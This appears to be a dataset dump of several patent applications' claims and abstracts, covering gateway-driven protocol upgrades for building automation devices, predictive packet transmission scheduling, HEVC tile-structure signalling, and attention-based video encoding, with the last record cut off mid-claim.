a processor; and a memory configured to store instructions that, when executed by the processor, are configured to cause the gateway to: establish communication with the building automation device over a first communication protocol; install executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establish communication with the building automation device over the second communication protocol. 7. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol comprise media access control (MAC) level protocols. 8. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol comprise physical level protocols. 9. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol are both selected from the group consisting of 6LoWPAN, IPv6 over Low power Wireless Personal Area Networks, IEEE 802.15.4, ZigBee, Thread, Bluetooth, Bluetooth Low Energy, Digital Enhanced Cordless Telecommunications Ultra Low Energy, DECT ULE, and EnOcean. 10. The gateway according to claim 6, wherein the second communication protocol comprises a later revision of the first communication protocol. 11. A computer program for managing communication with a building automation device, the computer program comprising computer program code which, when run on a gateway is configured to cause the gateway to:
establish communication with the building automation device over a first communication protocol; install executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establish communication with the building automation device over the second communication protocol. 12. A computer program product comprising the computer program according to claim 11 and a computer readable medium on which the computer program is stored. 13. A method for managing communication with a gateway, the method being performed in a building automation device and comprising the steps of:
establishing communication with the gateway over a first communication protocol; receiving, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol; receiving executable software instructions configured for communication over the second communication protocol; installing the executable software instructions to provide the capability to communicate over the second communication protocol; and establishing communication with the gateway over the second communication protocol. 14. The method according to claim 13, further comprising the step of:
accepting communication over the first communication protocol for a predetermined duration when the building automation device is powered on. 15. A building automation device for managing communication with a gateway, the building automation device comprising:
a processor; and a memory storing instructions that, when executed by the processor, are configured to cause the building automation device to:
establish communication with the gateway over a first communication protocol;
receive, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol;
receive executable software instructions to be used for communication over the second communication protocol;
install the executable software instructions to provide the capability to communicate over the second communication protocol; and
establish communication with the gateway over the second communication protocol. 16. The building automation device according to claim 15, further comprising instructions that, when executed by the processor, are configured to cause the building automation device to:
accept communication over the first communication protocol for a predetermined duration when the building automation device is powered on. 17. A computer program for managing communication with a gateway, the computer program comprising computer program code which, when run on a building automation device is configured to cause the building automation device to:
establish communication with the gateway over a first communication protocol; receive, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol; receive executable software instructions required for communication over the second communication protocol; install the executable software instructions to provide the capability to communicate over the second communication protocol; and establish communication with the gateway over the second communication protocol. 18. A computer program product comprising the computer program according to claim 17 and a computer readable medium on which the computer program is stored. | A method for managing communication with a building automation device, the method being performed in a gateway, the method including the steps of: establishing communication with the building automation device over a first communication protocol; installing executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establishing communication with the building automation device over the second communication protocol.1. A method for managing communication with a building automation device, the method being performed in a gateway and comprising the steps of:
establishing communication with the building automation device over a first communication protocol; installing executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establishing communication with the building automation device over the second communication protocol. 2. The method according to claim 1, wherein the first communication protocol and the second communication protocol comprise media access control (MAC) level protocols. 3. The method according to claim 1, wherein the first communication protocol and the second communication protocol comprise physical level protocols. 4. The method according to claim 1, wherein the first communication protocol and the second communication protocol are both selected from the group consisting of 6LoWPAN, IPv6 over Low power Wireless Personal Area Networks, IEEE 802.15.4, ZigBee, Thread, Bluetooth, Bluetooth Low Energy, Digital Enhanced Cordless Telecommunications Ultra Low Energy, DECT ULE, and EnOcean. 5. The method according to claim 1, wherein the second communication protocol comprises a later revision of the first communication protocol. 6. A gateway for managing communication with a building automation device, the gateway comprising:
a processor; and a memory configured to store instructions that, when executed by the processor, are configured to cause the gateway to: establish communication with the building automation device over a first communication protocol; install executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establish communication with the building automation device over the second communication protocol. 7. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol comprise media access control (MAC) level protocols. 8. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol comprise physical level protocols. 9. The gateway according to claim 6, wherein the first communication protocol and the second communication protocol are both selected from the group consisting of 6LoWPAN, IPv6 over Low power Wireless Personal Area Networks, IEEE 802.15.4, ZigBee, Thread, Bluetooth, Bluetooth Low Energy, Digital Enhanced Cordless Telecommunications Ultra Low Energy, DECT ULE, and EnOcean. 10. The gateway according to claim 6, wherein the second communication protocol comprises a later revision of the first communication protocol. 11. A computer program for managing communication with a building automation device, the computer program comprising computer program code which, when run on a gateway, is configured to cause the gateway to:
establish communication with the building automation device over a first communication protocol; install executable software instructions on the building automation device over the first communication protocol to provide a capability to communicate over a second communication protocol; and establish communication with the building automation device over the second communication protocol. 12. A computer program product comprising the computer program according to claim 11 and a computer readable medium on which the computer program is stored. 13. A method for managing communication with a gateway, the method being performed in a building automation device and comprising the steps of:
establishing communication with the gateway over a first communication protocol; receiving, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol; receiving executable software instructions configured for communication over the second communication protocol; installing the executable software instructions to provide the capability to communicate over the second communication protocol; and establishing communication with the gateway over the second communication protocol. 14. The method according to claim 13, further comprising the step of:
accepting communication over the first communication protocol for a predetermined duration when the building automation device is powered on. 15. A building automation device for managing communication with a gateway, the building automation device comprising:
a processor; and a memory storing instructions that, when executed by the processor, are configured to cause the building automation device to:
establish communication with the gateway over a first communication protocol;
receive, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol;
receive executable software instructions to be used for communication over the second communication protocol;
install the executable software instructions to provide the capability to communicate over the second communication protocol; and
establish communication with the gateway over the second communication protocol. 16. The building automation device according to claim 15, further comprising instructions that, when executed by the processor, are configured to cause the building automation device to:
accept communication over the first communication protocol for a predetermined duration when the building automation device is powered on. 17. A computer program for managing communication with a gateway, the computer program comprising computer program code which, when run on a building automation device, is configured to cause the building automation device to:
establish communication with the gateway over a first communication protocol; receive, from the gateway over the first communication protocol, a command to install a capability to communicate over a second communication protocol; receive executable software instructions required for communication over the second communication protocol; install the executable software instructions to provide the capability to communicate over the second communication protocol; and establish communication with the gateway over the second communication protocol. 18. A computer program product comprising the computer program according to claim 17 and a computer readable medium on which the computer program is stored. | 2,400 |
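The gateway-side method claimed above (establish communication over a first protocol, push executable instructions over it, then re-establish over the second protocol) can be illustrated with a toy model. This is a sketch only, not from the patent: all class, method, and protocol names below are invented for illustration.

```python
# Toy model of the claimed gateway-driven protocol upgrade.
# Names ("Device", "Gateway", "zigbee-1.0", "thread-1.3") are hypothetical.

class Device:
    """Building automation device that starts with one protocol installed."""

    def __init__(self):
        self.protocols = {"zigbee-1.0"}  # hypothetical first protocol
        self.active = None

    def connect(self, protocol):
        # Communication can only be established over an installed protocol.
        if protocol not in self.protocols:
            raise ValueError(f"protocol {protocol!r} not installed")
        self.active = protocol

    def install(self, protocol, instructions):
        # "install executable software instructions ... to provide a
        # capability to communicate over a second communication protocol"
        self.protocols.add(protocol)


class Gateway:
    def upgrade(self, device, first, second):
        device.connect(first)             # establish over the first protocol
        device.install(second, b"...")    # push instructions over the first protocol
        device.connect(second)            # re-establish over the second protocol
        return device.active


gw = Gateway()
dev = Device()
assert gw.upgrade(dev, "zigbee-1.0", "thread-1.3") == "thread-1.3"
```

The device-side claims (13-17) mirror this flow from the device's perspective, with the optional refinement that the first protocol is accepted only for a predetermined window after power-on.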
9,136 | 9,136 | 15,473,785 | 2,467 | A system, communication device, and method for scheduling transmissions from the communication device. The device predicts an arrival time of a next packet for transmission when a current packet arrives in a transmission buffer. The device plans a future transmission time of the next packet based on the predicted arrival time of the next packet, and books transmission resources for the planned future transmission time. If the next packet has arrived a Tdrop time period before the planned future transmission time, the device transmits the next packet. If the next packet has not arrived at that time, the device re-plans the future transmission time of the next packet. The device may then unbook the transmission resources for the planned future transmission time, book transmission resources for the re-planned future transmission time, and notify other communication devices that the unbooked transmission resources are available for use by the other communication devices. | 1. A method of scheduling transmissions from a communication device, the method comprising:
predicting an arrival time of a next packet for transmission when or after a current packet arrives; planning a future transmission time of the next packet based on the predicted arrival time of the next packet; and booking transmission resources for the planned future transmission time of the next packet. 2. The method according to claim 1, wherein predicting includes predicting the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 3. The method according to claim 1, wherein planning a future transmission time of the next packet includes utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 4. The method according to claim 1, further comprising:
determining whether the next packet has arrived before the planned future transmission time of the next packet; and transmitting the next packet in response to determining that the next packet has arrived before the planned future transmission time of the next packet. 5. The method according to claim 4, further comprising:
re-planning the future transmission time of the next packet in response to determining that the next packet has not arrived before the planned future transmission time of the next packet. 6. The method according to claim 1, further comprising:
determining whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmitting the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 7. The method according to claim 6, further comprising, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet:
re-planning the future transmission time of the next packet; unbooking the transmission resources for the planned future transmission time of the next packet; and booking transmission resources for the re-planned future transmission time of the next packet. 8. The method according to claim 7, further comprising notifying other communication devices that the unbooked transmission resources are available for use by the other communication devices. 9. The method according to claim 8, wherein notifying includes sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 10. The method according to claim 1, wherein the communication device is a wireless communication device. 11. A communication device, comprising:
a processor; a non-transitory memory for storing instructions executable by the processor; a transmit buffer connected to the processor; and an interface connected to the processor for transmitting packets from the communication device; wherein, when or after a current packet arrives in the transmit buffer, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
predict an arrival time of a next packet for transmission;
plan a future transmission time of the next packet based on the predicted arrival time of the next packet; and
book transmission resources for the planned future transmission time of the next packet. 12. The communication device according to claim 11, wherein the processor is configured to predict the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 13. The communication device according to claim 11, wherein the processor is configured to plan a future transmission time of the next packet utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 14. The communication device according to claim 11, wherein the processor is further configured to:
determine whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmit the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 15. The communication device according to claim 14, wherein, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet, the processor is further configured to:
re-plan the future transmission time of the next packet; unbook the transmission resources for the planned future transmission time of the next packet; and book transmission resources for the re-planned future transmission time of the next packet. 16. The communication device according to claim 15, wherein the processor is further configured to notify other communication devices that the unbooked transmission resources are available for use by the other communication devices. 17. The communication device according to claim 16, wherein the processor is configured to notify the other communication devices by sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 18. The communication device according to claim 11, wherein the communication device is a wireless communication device. 19. A system for scheduling transmissions from a plurality of communication devices involved in a communication using a shared medium, the system comprising:
within each of the plurality of communication devices, an apparatus comprising:
a processor;
a non-transitory memory for storing instructions executable by the processor and for buffering packets to be transmitted; and
an interface connected to the processor for transmitting packets from the communication device;
wherein, when or after a current packet arrives in the memory, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
predict an arrival time of a next packet for transmission;
plan a future transmission time of the next packet based on the predicted arrival time of the next packet;
book transmission resources for the planned future transmission time of the next packet; and
notify other communication devices of the booked transmission resources. 20. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to predict the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 21. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to plan a future transmission time of the next packet utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 22. The system according to claim 19, wherein the processor within each of the other communication devices is further configured to avoid transmitting at the planned future transmission time. 23. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to:
determine whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmit the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 24. The system according to claim 23, wherein, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet, the processor within each of the plurality of communication devices is further configured to:
re-plan the future transmission time of the next packet; unbook the transmission resources for the planned future transmission time of the next packet; and book transmission resources for the re-planned future transmission time of the next packet. 25. The system according to claim 24, wherein the processor within each of the plurality of communication devices is further configured to notify the other communication devices that the unbooked transmission resources are available for use by the other communication devices. 26. The system according to claim 25, wherein the processor within each of the plurality of communication devices is configured to notify the other communication devices by sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 27. The system according to claim 19, wherein the plurality of communication devices are wireless communication devices. 28. A communication device within a plurality of communication devices involved in a communication using a shared medium, the communication device comprising:
a processor; a non-transitory memory for storing instructions executable by the processor; and an interface connected to the processor for communicating with other communication devices within the plurality of communication devices; wherein, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
receive information about a planned transmission time by another communication device within the plurality of communication devices; and
avoid transmitting at the planned transmission time. | A system, communication device, and method for scheduling transmissions from the communication device. The device predicts an arrival time of a next packet for transmission when a current packet arrives in a transmission buffer. The device plans a future transmission time of the next packet based on the predicted arrival time of the next packet, and books transmission resources for the planned future transmission time. If the next packet has arrived a Tdrop time period before the planned future transmission time, the device transmits the next packet. If the next packet has not arrived at that time, the device re-plans the future transmission time of the next packet. The device may then unbook the transmission resources for the planned future transmission time, book transmission resources for the re-planned future transmission time, and notify other communication devices that the unbooked transmission resources are available for use by the other communication devices.1. A method of scheduling transmissions from a communication device, the method comprising:
predicting an arrival time of a next packet for transmission when or after a current packet arrives; planning a future transmission time of the next packet based on the predicted arrival time of the next packet; and booking transmission resources for the planned future transmission time of the next packet. 2. The method according to claim 1, wherein predicting includes predicting the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 3. The method according to claim 1, wherein planning a future transmission time of the next packet includes utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 4. The method according to claim 1, further comprising:
determining whether the next packet has arrived before the planned future transmission time of the next packet; and transmitting the next packet in response to determining that the next packet has arrived before the planned future transmission time of the next packet. 5. The method according to claim 4, further comprising:
re-planning the future transmission time of the next packet in response to determining that the next packet has not arrived before the planned future transmission time of the next packet. 6. The method according to claim 1, further comprising:
determining whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmitting the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 7. The method according to claim 6, further comprising, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet:
re-planning the future transmission time of the next packet; unbooking the transmission resources for the planned future transmission time of the next packet; and booking transmission resources for the re-planned future transmission time of the next packet. 8. The method according to claim 7, further comprising notifying other communication devices that the unbooked transmission resources are available for use by the other communication devices. 9. The method according to claim 8, wherein notifying includes sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 10. The method according to claim 1, wherein the communication device is a wireless communication device. 11. A communication device, comprising:
a processor; a non-transitory memory for storing instructions executable by the processor; a transmit buffer connected to the processor; and an interface connected to the processor for transmitting packets from the communication device; wherein, when or after a current packet arrives in the transmit buffer, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
predict an arrival time of a next packet for transmission;
plan a future transmission time of the next packet based on the predicted arrival time of the next packet; and
book transmission resources for the planned future transmission time of the next packet. 12. The communication device according to claim 11, wherein the processor is configured to predict the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 13. The communication device according to claim 11, wherein the processor is configured to plan a future transmission time of the next packet utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 14. The communication device according to claim 11, wherein the processor is further configured to:
determine whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmit the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 15. The communication device according to claim 14, wherein, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet, the processor is further configured to:
re-plan the future transmission time of the next packet; unbook the transmission resources for the planned future transmission time of the next packet; and book transmission resources for the re-planned future transmission time of the next packet. 16. The communication device according to claim 15, wherein the processor is further configured to notify other communication devices that the unbooked transmission resources are available for use by the other communication devices. 17. The communication device according to claim 16, wherein the processor is configured to notify the other communication devices by sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 18. The communication device according to claim 11, wherein the communication device is a wireless communication device. 19. A system for scheduling transmissions from a plurality of communication devices involved in a communication using a shared medium, the system comprising:
within each of the plurality of communication devices, an apparatus comprising:
a processor;
a non-transitory memory for storing instructions executable by the processor and for buffering packets to be transmitted; and
an interface connected to the processor for transmitting packets from the communication device;
wherein, when or after a current packet arrives in the memory, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
predict an arrival time of a next packet for transmission;
plan a future transmission time of the next packet based on the predicted arrival time of the next packet;
book transmission resources for the planned future transmission time of the next packet; and
notify other communication devices of the booked transmission resources. 20. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to predict the arrival time of the next packet for transmission based on arrival times of N most recently received packets. 21. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to plan a future transmission time of the next packet utilizing a planning method selected from a group consisting of:
computing the future transmission time as a function of the predicted arrival time of the next packet alone; computing the future transmission time as a function of the predicted arrival time of the next packet plus a parameter providing a minimum time between the arrival time of the next packet and the actual transmission of the next packet; computing the future transmission time as a function of the predicted arrival time of the next packet and the current time; and computing the future transmission time as a function of the predicted arrival time of the next packet and the transmission time of the current packet. 22. The system according to claim 19, wherein the processor within each of the other communication devices is further configured to avoid transmitting at the planned future transmission time. 23. The system according to claim 19, wherein the processor within each of the plurality of communication devices is further configured to:
determine whether the next packet has arrived before a defined time period (Tdrop) prior to the planned future transmission time; and transmit the next packet in response to determining that the next packet has arrived before the Tdrop time period prior to the planned future transmission time of the next packet. 24. The system according to claim 23, wherein, in response to determining that the next packet has not arrived before the Tdrop time period prior to the planned future transmission time of the next packet, the processor within each of the plurality of communication devices is further configured to:
re-plan the future transmission time of the next packet; unbook the transmission resources for the planned future transmission time of the next packet; and book transmission resources for the re-planned future transmission time of the next packet. 25. The system according to claim 24, wherein the processor within each of the plurality of communication devices is further configured to notify the other communication devices that the unbooked transmission resources are available for use by the other communication devices. 26. The system according to claim 25, wherein the processor within each of the plurality of communication devices is configured to notify the other communication devices by sending a control information packet at least the Tdrop time period before the planned future transmission time, the control information packet including:
an indicator for booking transmission resources for the re-planned future transmission time of the next packet; an indicator for informing the other communication devices that the communication device will not use the booked transmission resources for the planned future transmission time of the next packet; and a value indicating the planned future transmission time of the unbooked transmission resources. 27. The system according to claim 19, wherein the plurality of communication devices are wireless communication devices. 28. A communication device within a plurality of communication devices involved in a communication using a shared medium, the communication device comprising:
a processor; a non-transitory memory for storing instructions executable by the processor; and an interface connected to the processor for communicating with other communication devices within the plurality of communication devices; wherein, the processor is configured to execute the instructions in the memory, thereby causing the processor to:
receive information about a planned transmission time by another communication device within the plurality of communication devices; and
avoid transmitting at the planned transmission time. | 2,400 |
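The Tdrop logic in the claims above (claims 23–26) — transmit the next packet only if it arrived at least a guard interval Tdrop before its booked slot, otherwise unbook the slot and re-plan — can be sketched as a small decision routine. This is a hedged illustration, not the patented implementation: the time units, the `TDROP` value, and the simplistic `arrival + tdrop` re-planning rule are invented for the example.

```python
TDROP = 5  # hypothetical guard interval (time units) before the booked slot


def handle_next_packet(packet_arrival, planned_tx_time, tdrop=TDROP):
    """Decide whether to transmit at the booked slot or to re-plan.

    Returns ("transmit", planned_tx_time) when the packet arrived at least
    `tdrop` before the booked slot; otherwise ("replan", new_tx_time), at
    which point the old booking would be released so the other devices can
    use it (claim 25).
    """
    if packet_arrival <= planned_tx_time - tdrop:
        return ("transmit", planned_tx_time)
    # Packet is late: unbook the old slot and book a later one.
    new_tx_time = packet_arrival + tdrop  # placeholder re-planning rule
    return ("replan", new_tx_time)
```

With `TDROP = 5`, a packet arriving at t=0 for a slot at t=10 is sent as planned, while one arriving at t=8 triggers a re-plan to a later slot.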
9,137 | 9,137 | 14,391,092 | 2,482 | A method includes using a syntax element to indicate if tile information is the same for a sequence. The sequence is typically a bitstream for which one sequence parameter set (SPS) is valid. The syntax element can be part of the SPS or signaled such as in VUI or in an SEI message. Furthermore, the syntax element can be a flag, for example denoted tiles_fixed_structure_flag. The encoder decides how the pictures are divided by a tile structure enabling parallel encoding/decoding. When the same tile structure is used throughout a sequence, information that the same tile structure is used throughout a sequence of the video stream is sent to the decoder. | 1. A method for encoding a sequence of pictures of a video stream of multiple pictures to be performed in an encoder, the method comprises:
deciding whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and sending information that the same tile structure is used throughout the sequence of the video stream based on deciding that the same tile structure is used throughout the sequence of the video stream. 2. The method according to claim 1, wherein the information that the same tile structure is used throughout the sequence of the video stream is sent by a flag. 3. The method according to claim 1, wherein the information that the same tile structure is used throughout the sequence of the video stream is sent in a syntax element tiles_fixed_structure_flag. 4. The method according to claim 3, wherein the syntax element is sent in a sequence parameter set, SPS. 5. The method according to claim 1, wherein the deciding and the sending are performed by a High Efficiency Video Coding, HEVC, encoder. 6. A method for parsing a sequence of pictures of a video stream of multiple pictures to be performed in an element, the method comprises:
receiving information if the same tile structure is used throughout a sequence of the video stream, receiving the information indicating the same tile structure is used throughout the sequence of pictures of the video stream, and using said received information to control decoding of the sequence of the pictures of the video stream. 7. The method according to claim 6, wherein the information that the same tile structure is used throughout the sequence of the pictures of the video stream is received by a flag. 8. The method according to claim 6, wherein the information that the same tile structure is used throughout the sequence of the pictures of the video stream is received in a syntax element tiles_fixed_structure_flag. 9. The method according to claim 8, wherein the syntax element is received in a sequence parameter set, SPS. 10. The method according to claim 6, wherein the element is a network element or a decoder that is a High Efficiency Video Coding, HEVC, decoder. 11. An encoder for encoding a sequence of pictures of a video stream of multiple pictures, the encoder comprises:
a determining circuit configured to decide whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and an output circuit configured to send information of the tile structure into which the current pictures are divided, and to send information that the same tile structure is used throughout the sequence of the pictures of the video stream based on deciding that the same tile structure is used throughout the sequence of the pictures of the video stream. 12. The encoder according to claim 11, wherein the output circuit of the encoder is configured to send the information that the same tile structure is used throughout the sequence of the pictures of the video stream in a syntax element tiles_fixed_structure_flag. 13. The encoder according to claim 12, wherein the output circuit of the encoder is configured to send the syntax element in a sequence parameter set, SPS. 14. The encoder according to claim 11, wherein the output circuit is further configured to send the information that the same tile structure is used throughout a sequence of the pictures of the video stream during a session set-up. 15. The encoder according to claim 11, wherein the output circuit is further configured to signal entry points relative to each other, wherein the entry points indicate the first byte of the respective tile. 16. The encoder according to claim 11, wherein the encoder is a High Efficiency Video Coding, HEVC, encoder. 17. An element for parsing a sequence of pictures of a video stream of multiple pictures, the element comprises:
an input circuit configured to receive information of the tile structure into which the current pictures are divided, to receive the information if the same tile structure is used throughout a sequence of the pictures of the video stream, and a parsing circuit configured to parse and use said received information to control decoding of the sequence of the pictures of the video stream. 18. The element according to claim 17, wherein the input circuit of the element is configured to receive the information that the same tile structure is used throughout the sequence of the pictures of the video stream in a syntax element tiles_fixed_structure_flag. 19. The element according to claim 17, wherein the input circuit of the element is configured to receive the syntax element in a sequence parameter set, SPS. 20. The element according to claim 17, wherein the input circuit is further configured to receive information that the same tile structure is used throughout a sequence of the pictures of the video stream during a session set-up. 21. The element according to claim 17, wherein the input circuit is further configured to receive information of entry points relative to each other, wherein the entry points indicate the first byte of the respective tile. 22. The element according to claim 17, wherein the element is a network element or a decoder that is a High Efficiency Video Coding, HEVC, decoder. 23. A transmitter comprising:
an encoder for encoding a sequence of pictures of a video stream of multiple pictures, the encoder comprises:
a determining circuit configured to decide whether all the pictures in said sequence are divided in the same way by tiles using a tile structure, and
an output circuit configured to send information of the tile structure into which the current pictures are divided, and to send the information that the same tile structure is used throughout the sequence of the pictures of the video stream when the same tile structure is used throughout the sequence of the video stream. 24. A receiver comprising:
an element for parsing a sequence of pictures of a video stream of multiple pictures, the element comprises:
an input circuit configured to receive information of the tile structure into which the current pictures are divided, to receive the information if the same tile structure is used throughout a sequence of the pictures of the video stream and a parsing circuit configured to parse and use said received information to control decoding of the sequence of the pictures of the video stream. 25. A device comprising a transmitter according to claim 23. 26. A computer program product comprising a non-transitory computer readable medium containing computer readable code which when run on a processor causes the processor to:
decide whether all the pictures in a sequence of pictures of a video stream of multiple pictures are divided in the same way by tiles using a tile structure, and send information that the same tile structure is used throughout the sequence of the pictures of the video stream based on deciding the same tile structure is used throughout the sequence of the video stream. 27. (canceled) 28. A computer program product comprising a non-transitory computer readable medium containing computer readable code which when run on a processor causes the processor to:
receive information that a sequence of pictures of a video stream of multiple pictures is divided in a same way by tiles using a same tile structure; receive the information indicating the same tile structure is used throughout the sequence of pictures of the video stream; and use said received information to control decoding of the sequence of the pictures of the video stream. 29. (canceled) | 2,400 |
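The encoder-side decision claimed in application 14,391,092 — check whether every picture in the sequence uses one tile structure and, if so, signal tiles_fixed_structure_flag in the SPS — can be sketched as follows. The tile-structure representation (a grid tuple per picture) and the dict standing in for the SPS are assumptions for illustration only; real HEVC bitstream writing entropy-codes the flag into the parameter set.

```python
def tiles_fixed_structure(tile_structures):
    """True when every picture in the coded sequence uses the same tile grid."""
    first = tile_structures[0]
    return all(ts == first for ts in tile_structures)


def write_sps_flag(tile_structures):
    # A real encoder would code this bit into the SPS (or signal it in VUI or
    # an SEI message, per the abstract); a dict stands in for the parameter
    # set here, purely as an assumption of this sketch.
    return {"tiles_fixed_structure_flag": int(tiles_fixed_structure(tile_structures))}
```

A decoder receiving the flag set to 1 can then plan parallel decoding once, instead of re-parsing the tile layout per picture.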
9,138 | 9,138 | 15,916,616 | 2,488 | Disclosed are various embodiments for adjusting the encoding of a video signal into a video stream based on user attention. A first portion of a first video frame is encoded at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion. The first and second encoded portions are displayed in a second video frame. | 1. A system, comprising:
one or more processors; and memory to store computer-executable instructions that, if executed, cause the one or more processors to:
encode a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and
display the first and second encoded portions in a second video frame. 2. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 3. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion based, at least in part, on the first video frame and a stored profile associated with an application that generates a video signal that includes the first video frame. 4. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion based, at least in part, on receiving an event indication from an application that generates a video signal that includes the first video frame. 5. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. 6. The system of claim 1, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 7. A method, comprising:
